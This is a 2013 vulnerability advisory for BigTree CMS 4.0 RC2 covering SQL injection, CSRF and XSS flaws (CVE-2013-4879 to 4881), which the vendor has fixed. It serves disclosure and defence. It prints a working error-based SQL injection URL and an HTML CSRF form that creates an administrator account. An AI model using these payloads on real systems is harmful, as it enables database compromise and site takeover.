Product: BigTree CMS
Vendor: BigTree CMS
Vulnerable Versions: 4.0 RC2 and probably prior
Tested Version: 4.0 RC2
Vendor Notification: July 17, 2013
Vendor Fix: July 17, 2013
Public Disclosure: August 7, 2013
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2013-4879, CVE-2013-4880, CVE-2013-4881
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in application's database and gain complete control over the application.
1) SQL Injection in BigTree CMS: CVE-2013-4879
The vulnerability exists due to insufficient sanitisation of user-supplied data passed to "/site/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
The following PoC (Proof of Concept) code displays version of MySQL server:
http://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select %20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20 group%20by%20x%29a%29and%27
SQL injection vulnerability was independently discovered by the Vendor just before High-Tech Bridge Security Research Lab.
2) Сross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881
The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can create a malicious web page with CSRF exploit, trick a logged-in administrator into opening that page and create a new user with administrative privileges.
The basic CSRF exploit below will create a new administrator "attacker" with password "password":
<form action="http://[host]/site/index.php/admin/users/create/" method="post" name="main">
<input type="hidden" name="email" value="firstname.lastname@example.org">
<input type="hidden" name="password" value="password">
<input type="hidden" name="level" value="1">
<input type="hidden" name="name" value="attacker">
<input type="hidden" name="company" value="company">
<input type="submit" id="btn">
3) Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880
The vulnerability exists due to insufficient filtration of user-supplied data in "module" HTTP GET parameter passed to "/site/index.php/admin/developer/modules/views/add/" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
Replace the following files with their updated versions from GitHub:
 High-Tech Bridge Advisory HTB23165 - https://www.htbridge.com/advisory/HTB23165 - Multiple Vulnerabilities in BigTree CMS.
 BigTree CMS - http://www.bigtreecms.org/ - BigTree CMS is an open source content management system built on PHP and MySQL.
 Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
 Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.